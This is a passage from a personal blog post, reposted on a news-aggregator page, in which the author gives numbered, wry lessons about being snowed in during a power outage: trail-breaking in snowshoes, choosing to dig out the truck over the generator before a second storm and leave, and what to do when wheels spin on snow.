Your ego thus buoyed (in case you needed it), you can find common ground, for instance, about the problem of snow — Huntington mentions how when two people are walking across snowfields in snowshoes, it’s more exhausting to be the person in front breaking the trail. He and his brother would take turns. You can relate to this, now. The second time walking over a path really is easier.
22. While making your little plans, at some point, you will learn — using the threads of cell power you’re able to obtain from the last live power bank you didn’t even know was in the house until you tore through it looking for one — that another storm is due in the next couple days, and that the power company has no ETA on a repair. You will look at your dwindling supply of easily available firewood. You will look at your to-do list:
a) dig out enough space for the large generator, which you think might be more likely to turn on than the small one
b) dig out the truck, just in case
You will look at your two “uh, yeah, I have a blog” noodle arms. You will consider Point 6.
Spend your energy digging the truck out. Throw some clothes inside. Get the hell out of there.
23. You already know that if you’re trying to drive a car over snowy ground, and the wheels start spinning but the car is stuck in place, you need to stop doing what you’re doing right away and try doing something else with the wheels, right? Good.
...
Read the original on eukaryotewritesblog.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.